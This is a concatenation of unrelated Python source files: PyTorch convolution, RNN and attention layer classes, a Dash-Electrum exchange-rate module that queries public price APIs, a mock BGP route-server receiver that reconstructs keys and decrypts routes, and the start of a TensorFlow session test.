raise NotImplementedError("Conv{}D".format(dimensions))
# Set up attributes
self.dimensions = dimensions
self.filters = filters
self.input_shape = input_shape
self.padding = padding
self.kernel_size = kernel_size
self.stride = stride
self.dilation = dilation
self.groups = groups
self.use_bias = use_bias
self.input_activation = input_activation
self.activation = activation
self.num_layers = num_layers
self.input_batchnorm = input_batchnorm
self.batchnorm = batchnorm
self.input_dropout = input_dropout
self.dropout = dropout
# Build the layers
self.conv_layers = []
def get_same_padding(self, input_len):
total_padding = int(self.stride * (input_len - 1) + 1 + self.dilation * (self.kernel_size - 1) - input_len)
if total_padding % 2 == 1:
pad_l = total_padding // 2
return pad_l, total_padding - pad_l
else:
pad = total_padding // 2
return pad, pad
def get_padding(self, input_len):
if self.padding != 'same':
return self.padding, self.padding
else:
return self.get_same_padding(input_len)
def pad_input(self, x):
raise NotImplementedError("Layer does not know how to pad input")
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
if channels_mode == "channels_last":
input_channels = self.input_shape[-1]
else:
input_channels = self.input_shape[0]
self.conv_layers = build_conv(
self.dimensions, input_channels, self.filters,
self.kernel_size, stride=self.stride,
dilation=self.dilation, groups=self.groups, use_bias=self.use_bias,
input_activation=self.input_activation, activation=self.activation,
num_layers=self.num_layers, input_batchnorm=self.input_batchnorm,
batchnorm=self.batchnorm, input_dropout=self.input_dropout,
dropout=self.dropout)
def calc_output_size(self, input_size):
"""
NOTE: This is designed for pytorch longtensors, if you pass an integer, make sure to cast it back to an
integer as python3 will perform float division on it
"""
output_size = (input_size - self.dilation * (self.kernel_size - 1) + 2 * self.padding - 1) // self.stride + 1
return output_size
def calc_input_size(self, output_size):
return (output_size - 1) * self.stride - 2 * self.padding + 1 + self.dilation * (self.kernel_size - 1)
def forward(self, inputs):
if not self.built:
self.__build_layer(inputs)
# Expect inputs as BatchSize x Length1 x ... x LengthN x Filters
if channels_mode == "channels_last":
inputs = self.fix_input(inputs)
inputs = self.conv_layers(self.pad_input(inputs))
if channels_mode == "channels_last":
inputs = self.unfix_input(inputs)
return inputs
def reset_parameters(self):
for layer in self.conv_layers:
if any(isinstance(layer, self.layer_constructors[dim]) or isinstance(layer, self.bn_constructors[dim])
for dim in self.layer_constructors):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return "%r" % self.conv_layers
class Conv1D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv1D, self).__init__(1, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.transpose(1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.transpose(1, 2).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x length
return F.pad(inputs, self.get_padding(inputs.size(2)))
class Conv2D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv2D, self).__init__(2, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.permute(0, 3, 1, 2).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 1).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x height x width
padding = self.get_padding(inputs.size(2)) + \
self.get_padding(inputs.size(3))
return F.pad(inputs, padding)
class Conv3D(Conv):
def __init__(self, filters, kernel_size, input_shape=None, stride=1,
padding='same', dilation=1, groups=1,
use_bias=True, input_activation='linear', activation='linear',
num_layers=1, input_batchnorm=False, batchnorm=False,
input_dropout=0.0, dropout=0.0):
super(Conv3D, self).__init__(3, filters, kernel_size,
input_shape=input_shape, stride=stride,
padding=padding,
dilation=dilation, groups=groups,
use_bias=use_bias,
input_activation=input_activation,
activation=activation,
num_layers=num_layers,
input_batchnorm=input_batchnorm,
batchnorm=batchnorm,
input_dropout=input_dropout,
dropout=dropout)
def fix_input(self, inputs):
return inputs.permute(0, 4, 1, 2, 3).contiguous()
def unfix_input(self, outputs):
return outputs.permute(0, 2, 3, 4, 1).contiguous()
def pad_input(self, inputs):
# inputs is batch_size x channels x height x width x time
padding = self.get_padding(inputs.size(2)) + \
self.get_padding(inputs.size(3)) + \
self.get_padding(inputs.size(4))
return F.pad(inputs, padding)
# recurrent.py
def build_rnn(rnn_type, input_size, output_size, num_layers=1, bidirectional=False,
input_dropout=0.0, dropout=0.0):
# Create the sequential
layer = nn.Sequential()
# Add the input dropout
if input_dropout:
layer.add_module(name="input-dropout", module=nn.Dropout(input_dropout))
layer.add_module(name="rnn", module=RNN.layer_constructors[rnn_type](input_size, output_size, num_layers=num_layers, dropout=dropout,
bidirectional=bidirectional, batch_first=True))
logging.info("Creating layer: %r" % layer)
return layer
class RNN(Layer):
layer_constructors = {'gru': nn.GRU, 'lstm': nn.LSTM,
"tanh_simple": lambda *args, **kwargs: nn.RNN(*args, nonlinearity='tanh', **kwargs),
"relu_simple": lambda *args, **kwargs: nn.RNN(*args, nonlinearity='relu', **kwargs)}
def __init__(self, rnn_type, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(RNN, self).__init__()
units = units // 2 if bidirectional else units
# Set up the attributes
self.rnn_type = rnn_type
self.input_shape = input_shape
self.units = units
self.num_layers = num_layers
self.bidirectional = bidirectional
self.input_dropout = input_dropout
self.dropout = dropout
self.return_sequences = return_sequences
self.return_state = return_state
# Build the layers
self.rnn_layers = []
@builder
def __build_layer(self, inputs):
if self.input_shape is None:
self.input_shape = get_input_shape(inputs)
self.rnn_layers = build_rnn(
self.rnn_type, self.input_shape[-1], self.units,
num_layers=self.num_layers, bidirectional=self.bidirectional,
input_dropout=self.input_dropout, dropout=self.dropout)
def calc_output_size(self, input_size):
return input_size
def forward(self, x):
if not self.built:
self.__build_layer(x)
x, states = self.rnn_layers(x)
if not self.return_sequences:
if self.bidirectional:
x = torch.cat([x[:, -1, :self.units], x[:, 0, self.units:]], dim=-1)
else:
x = x[:, -1]
if self.return_state:
return x, states
return x
def reset_parameters(self):
for layer in self.rnn_layers:
if isinstance(layer, nn.RNNBase):
logging.info("Resetting layer %s" % layer)
layer.reset_parameters()
def __str__(self):
return ("%r\n\treturn_sequences={}, return_state={}" % self.rnn_layers).format(self.return_sequences,
self.return_state)
class SimpleRNN(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False,
nonlinearity='tanh'):
rnn_type = nonlinearity + "_" + "simple"
super(SimpleRNN, self).__init__(
rnn_type, units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
class GRU(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(GRU, self).__init__(
'gru', units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
class LSTM(RNN):
def __init__(self, units, input_shape=None, num_layers=1,
bidirectional=False, input_dropout=0.0, dropout=0.0,
return_sequences=False, return_state=False):
super(LSTM, self).__init__(
'lstm', units, input_shape=input_shape, num_layers=num_layers,
bidirectional=bidirectional, input_dropout=input_dropout,
dropout=dropout, return_sequences=return_sequences,
return_state=return_state)
# wrappers.py
class Identity(Layer):
"""
This is used to create layer wrappers without passing a layer.
"""
def __init__(self):
super(Identity, self).__init__()
def forward(self, x):
return x
def calc_output_size(self, input_size):
return input_size
# Singleton Identity layer
Identity = Identity()
class SequenceInput(Layer):
"""
Wrapper for a layer that should take in variable length sequences as inputs.
This wrapper will take as input a list of (batch size number of) sequences.
Before passing to its layer, the wrapper will pad the sequences to the longest
sequence in the batch, pass to the layer, then unpad back to the list of sequence form.
The wrapper requires that sequence lengths are not modified when passed through the layer.
Dropout will be applied to the nonpadded sequence.
"""
def __init__(self, wrapped_layer=Identity, input_dropout=0., dropout=0., pad_value=0.):
super(SequenceInput, self).__init__()
self.layer = wrapped_layer
self.input_dropout = nn.Dropout(input_dropout)
self.input_dropout_p = input_dropout
self.dropout = nn.Dropout(dropout)
self.dropout_p = dropout
self.pad_value = pad_value
self.__descriptor = "SequenceInput(input_dropout=%s, dropout=%s, pad_value=%s)" % (
self.input_dropout, self.dropout, self.pad_value)
logging.info("Wrapping layer with %s: %r" % (self.__descriptor, self.layer))
def forward(self, x):
if self.input_dropout_p:
x = [self.input_dropout(sample.unsqueeze(0)).squeeze(0) for sample in x]
x, pad_lens = pad_sequences(x, pad_value=self.pad_value)
x = self.layer(x)
x = unpad_sequences(x, pad_lens)
if self.dropout_p:
x = [self.dropout(sample.unsqueeze(0)).squeeze(0) for sample in x]
return x
def reset_parameters(self):
self.layer.reset_parameters()
def __str__(self):
return self.__descriptor + "(%r)" % self.layer
class TimeDistributed(Layer):
def __init__(self, wrapped_layer):
super(TimeDistributed, self).__init__()
self.layer = wrapped_layer
logging.info("TimeDistributing %r layer" % self.layer)
def forward(self, x):
x, seq_lens = pack_sequences(x) # B*Li x I
x = self.layer(x) # B*Li x O
x = unpack_sequences(x, seq_lens)
return x
def reset_parameters(self):
self.layer.reset_parameters()
def __str__(self):
return "TimeDistributed" + "(%r)" % self.layer
class MaskedLayer(Layer):
def __init__(self, layer=Identity, mask_value=0.0, dim=1):
super(MaskedLayer, self).__init__()
self.layer = layer
self.dim = dim
if dim == 1:
self.masker = MaskedInput(mask_value=mask_value)
elif dim == 2:
self.masker = MaskedInput2D(mask_value=mask_value)
else:
raise NotImplementedError("dim=%s" % dim)
logging.info("Masking {} layer with mask_value={}".format(self.layer, mask_value))
def forward(self, x, seq_lens):
x = self.masker(x, seq_lens)
x = self.layer(x)
seq_lens = self.layer.calc_output_size(seq_lens)
return x, seq_lens
def reset_parameters(self):
self.layer.reset_parameters()
# attentional.py
class ContextAttention(Layer):
def __init__(self, units, input_shape=None, activation='tanh',
batchnorm=False, padded_input=True, dropout=0.0):
super(ContextAttention, self).__init__()
self.units = units
self.input_shape = input_shape
self.activation_name = activation
self.batchnorm = batchnorm
self.padded_input = padded_input
self.dropout = dropout
self.attentional_module = None
self.context_vector = None
self.context_attention = None
@builder
def __build_layer(self, inputs):
assert self.input_shape is None
# Use the 0th input since the inputs are time distributed
self.input_shape = get_input_shape(inputs[0])
self.attentional_module = FullyConnected(
self.input_shape[0], input_shape=self.input_shape,
activation=self.activation_name, batchnorm=self.batchnorm,
dropout=self.dropout)
self.context_vector = FullyConnected(
self.units, input_shape=self.input_shape, use_bias=False,
batchnorm=False)
self.context_attention = TimeDistributed(
nn.Sequential(self.attentional_module, self.context_vector)
)
def forward(self, x, seq_lens=None):
if self.padded_input:
padded_input = x
if seq_lens is None:
seq_lens = LongTensor([x.size(1)] * x.size(0))
x = unpad_sequences(x, seq_lens)
else:
padded_input, _ = pad_sequences(x) # B x L x H
# Build the layer if we don't know the input shape
if not self.built:
self.__build_layer(x)
# The input comes in as B x Li x E
att = self.context_attention(x) # B x L x H
att, _ = seq_softmax(att, return_padded=True) # B x L x K
out = torch.bmm(att.transpose(1, 2), padded_input) # B x K x H
return out.squeeze_(1)
def reset_parameters(self):
if self.built:
self.attentional_module.reset_parameters()
self.context_vector.reset_parameters()
def __str__(self):
return "%r" % self.pool
class ContextMaxPool1D(Layer):
def __init__(self, units=1, input_shape=None, activation='linear',
batchnorm=False, padded_input=True, dropout=0.0):
super(ContextMaxPool1D, self).__init__()
self.units = units
self.activation = activation
self.batchnorm = batchnorm
self.padded_input = padded_input
self.dropout = dropout
self.max_pool = SequenceGlobalMaxPooling1D()
self.context_attention = None
@builder
def __build_layer(self, inputs):
assert self.input_shape is None
# Use the 0th input since the inputs are time distributed
self.input_shape = get_input_shape(inputs[0])
self.context_attention = nn.ModuleList(
[TimeDistributed(
FullyConnected(self.input_shape[0],
input_shape=self.input_shape, batchnorm=self.batchnorm,
activation=self.activation, dropout=self.dropout
) for _ in range(self.units))
]
)
def forward(self, x, seq_lens=None):
if self.padded_input:
padded_input = x
x = unpad_sequences(x, seq_lens)
else:
padded_input, _ = pad_sequences(x) # B x L x H
# Build the layer if we don't know the input shape
if not self.built:
self.__build_layer(x)
# The input comes in as B x Li x E
out_heads = torch.stack([self.max_pool(head(x)) for head in self.context_attention], dim=1) # B x K x H
return out_heads.squeeze_(1)
def reset_parameters(self):
if self.built:
for i in range(len(self.context_attention)):
self.context_attention[i].reset_parameters()
def __str__(self):
return "%r" % self.pool
"""
AUGMENTERS
Files included:
- augmenters.py
Files not included:
image.py
"""
class Augmenter(object):
def __init__(self, labels=True, augment_labels=False):
self.labels = labels
self.augment_labels = augment_labels
def _augment(self, batch):
# Split the batch if necessary
if self.labels:
x, y = batch
seed = np.random.randint(2 ** 32)
if self.augment_labels:
np.random.seed(seed)
y = self.augment(y)
np.random.seed(seed)
x = self.augment(x)
return x, y
else:
x = batch
return self.augment(x)
def augment(self, x):
raise NotImplementedError()
def __call__(self, generator):
return AugmenterGenerator(self, generator)
class AugmenterGenerator(BatchGenerator):
def __init__(self, augmenter, generator):
# Copy the steps per epoch and batch size if it has one
if hasattr(generator, "steps_per_epoch") \
and hasattr(generator, "batch_size"):
super(AugmenterGenerator, self).__init__(
steps_per_epoch=generator.steps_per_epoch,
batch_size=generator.batch_size)
else:
logging.warning("Input generator does not have a "
"steps_per_epoch or batch_size "
"attribute. Continuing without them.")
self.augmenter = augmenter
self.generator = generator
def __next__(self):
return self.augmenter._augment(next(self.generator))
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, make_dir
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8, 'ETH': 8}
DEFAULT_EXCHANGE = 'BitcoinAverage'
DEFAULT_CCY = 'USD'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Dash-Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Dash-Electrum'
})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com',
'/indices/local/ticker/DASH%s' % ccy)
return {ccy: Decimal(json['last'])}
def history_ccys(self):
return ['USD', 'EUR', 'PLN']
def request_history(self, ccy):
history = self.get_json('apiv2.bitcoinaverage.com',
"/indices/local/history/DASH%s"
"?period=alltime&format=json" % ccy)
return dict([(h['time'][:10], h['average']) for h in history])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=%s-DASH' % ccy)
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies[ccy] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
dash_ticker = json.get('BTC_DASH')
quote_currencies['BTC'] = Decimal(dash_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/dash/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
with open(path, 'r', encoding='utf-8') as f:
return json.loads(f.read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print(name, "ok")
except:
print(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
make_dir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_history_capital_gains_config(self):
return bool(self.config.get('history_rates_capital_gains', False))
def set_history_capital_gains_config(self, b):
self.config.set_key('history_rates_capital_gains', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", DEFAULT_CCY)
def config_exchange(self):
return self.config.get('use_exchange', DEFAULT_EXCHANGE)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, Bittrex)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
self.exchange.read_historical_rates(self.ccy, self.cache_dir)
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate is None:
return Decimal('NaN')
return Decimal(rate)
def format_amount(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s" % self.value_str(btc_balance, rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate.is_nan() else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate.is_nan() else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def fiat_value(self, satoshis, rate):
return Decimal('NaN') if satoshis is None else Decimal(satoshis) / COIN * Decimal(rate)
def value_str(self, satoshis, rate):
return self.format_fiat(self.fiat_value(satoshis, rate))
def format_fiat(self, value):
if value.is_nan():
return _("No data")
return "%s" % (self.ccy_amount_str(value, True))
def history_rate(self, d_t):
if d_t is None:
return Decimal('NaN')
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate == 'NaN' and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy, 'NaN')
self.history_used_spot = True
return Decimal(rate)
def historical_value_str(self, satoshis, d_t):
return self.format_fiat(self.historical_value(satoshis, d_t))
def historical_value(self, satoshis, d_t):
return self.fiat_value(satoshis, self.history_rate(d_t))
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
member-receiver-mock-prio.py
|
__author__ = 'marco'
import argparse
import pickle
from multiprocessing.connection import Listener, Client
import os
import signal
import Queue
from threading import Thread
import sys
np = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
if np not in sys.path:
sys.path.append(np)
import util.log
import subprocess
import json
from crypto_util import AESCipher
import multiprocessing as mp
import port_config
logger = util.log.getLogger('Mock-Host')
KEY_LENGTH = 16 # bytes
KEY_ID_SIZE = 16 # bits
KEY_HEX_LENGTH = 32 # number of hex of key, KEY_LENGTH * 2
KEY_AND_ID_HEX_LENGTH = 36 # number of hex of key and id, KEY_LENGTH * 2 + KEY_ID_SIZE / 4
DUMMY_KEY="00000000000000000000000000000000"
RS1_MODE =1
RS2_MODE =2
class Host:
def __init__(self, asn_2_id_file):
logger.info("Initializing the Host.")
with open(asn_2_id_file, 'r') as f:
self.asn_2_id = json.load(f)
self.id_2_asn = [ '' for i in xrange(0, len(self.asn_2_id))]
for asn, as_id in self.asn_2_id.items():
self.id_2_asn[as_id] = asn
# connect to XRS Server
self.conn_to_rs1 = Client((port_config.process_assignement["rs1"], port_config.ports_assignment["rs1_send_mpc_output"]), authkey=None)
self.conn_to_rs2 = Client((port_config.process_assignement["rs2"], port_config.ports_assignment["rs2_send_mpc_output"]), authkey=None)
self.run = True
self.stop_received_from_one_rs=False
self.route_id_to_msges = {}
def start(self):
self.lock = mp.Manager().Lock()
self.receive_messages_th = Thread(target=self.receive_messages,args=[RS2_MODE])
self.receive_messages_th.setName( "receiver from rs2")
self.receive_messages_th.daemon = True
self.receive_messages_th.start()
self.receive_messages(RS1_MODE)
logger.debug("waiting for RS1_MODE thread")
self.receive_messages_th.join()
logger.debug("ending")
def receive_messages(self,mode):
conn=None
if mode == RS1_MODE:
conn = self.conn_to_rs1
else:
conn = self.conn_to_rs2
waiting = 0
# start the MPC process in background
i=0
while self.run:
# get messages
#try:
#if mode == RS1_MODE:
# print "waiting for message from RS1"
#else:
# print "waiting for message from RS2"
msg = conn.recv()
msg = pickle.loads(msg)
#if mode == RS1_MODE:
# print "Got message from RS1. " + str("stop" in msg)
#else:
# print "Got message from RS2. " + str("stop" in msg)
#except:
# pass
waiting = 0
if "stop" in msg:
logger.info("received stop message " + str(mode))
break
else:
self.lock.acquire()
logger.debug("received message for announcement_id " + str(msg["announcement_id"]))
if mode == RS1_MODE:
if msg["announcement_id"] not in self.route_id_to_msges:
self.route_id_to_msges[msg["announcement_id"]] = {}
self.route_id_to_msges[msg["announcement_id"]]["rs1"] = msg["key"]
self.route_id_to_msges[msg["announcement_id"]]["encrypted_route"] = msg["encrypted_route"]
self.route_id_to_msges[msg["announcement_id"]]["list_of_route_ids"] = msg["list_of_route_ids"]
else:
if msg["announcement_id"] not in self.route_id_to_msges:
self.route_id_to_msges[msg["announcement_id"]]={}
self.route_id_to_msges[msg["announcement_id"]]["rs2"] = msg["key"]
if "rs1" in self.route_id_to_msges[msg["announcement_id"]] and \
"rs2" in self.route_id_to_msges[msg["announcement_id"]]:
self.reconstruct_message(msg["announcement_id"])
pass
self.lock.release()
print "exiting receive message " + str(mode)
def reconstruct_message(self, announcement_id):
encrypted_route = self.route_id_to_msges[announcement_id]["encrypted_route"]
keys_from_rs1 = self.route_id_to_msges[announcement_id]["rs1"].decode("hex")
keys_from_rs2 = self.route_id_to_msges[announcement_id]["rs2"].decode("hex")
key = xor_strings(keys_from_rs1, keys_from_rs2).encode("hex")
list_of_route_ids = self.route_id_to_msges[announcement_id]["list_of_route_ids"]
#print "key1: " + self.route_id_to_msges[route_id]["rs1"]
#print "key2: " + self.route_id_to_msges[route_id]["rs2"]
logger.debug("key: " + key)
keys = []
ids = []
for i in range(0, len(key) / KEY_AND_ID_HEX_LENGTH):
keys.append(key[i * KEY_AND_ID_HEX_LENGTH: i * KEY_AND_ID_HEX_LENGTH + KEY_HEX_LENGTH])
ids.append(key[i * KEY_AND_ID_HEX_LENGTH + KEY_HEX_LENGTH: i * KEY_AND_ID_HEX_LENGTH + KEY_AND_ID_HEX_LENGTH])
logger.info("key received for route_id in list: " + ids[i])
#print "getting encrypted key:" + key
if keys[i] == DUMMY_KEY:
logger.info("BGP-speaker " + self.id_2_asn[i] + " received dummy key for announcement " + str(announcement_id))
pass
else:
logger.debug("ready to decrypt with key " + str(keys[i]))
cipher = AESCipher(keys[i].decode("hex"))
route_id = list_of_route_ids[int(ids[i], 16)-1];
encrypted_route =self.route_id_to_msges[route_id]["encrypted_route"]
decrypted_object = cipher.decrypt(encrypted_route)
decrypted_route = pickle.loads(decrypted_object) # decrypt serialized route object
logger.info("decrypted route: " + str(decrypted_route))
logger.info("BGP-speaker " + self.id_2_asn[i] + " decrypted route: " + str(decrypted_route.id) + " for announcement " + str(announcement_id))
def stop(self):
logger.info("Stopping.")
self.run = False
def xor_strings(xs, ys):
return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
def main():
parser = argparse.ArgumentParser()
parser.add_argument("asn_2_id_file", type=str, help="specify asn_2_id json file")
args = parser.parse_args()
pprs = Host(args.asn_2_id_file)
rs_thread = Thread(target=pprs.start)
rs_thread.daemon = True
rs_thread.start()
while rs_thread.is_alive():
try:
rs_thread.join(1)
except KeyboardInterrupt:
pprs.stop()
if __name__ == '__main__':
main()
|
session_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
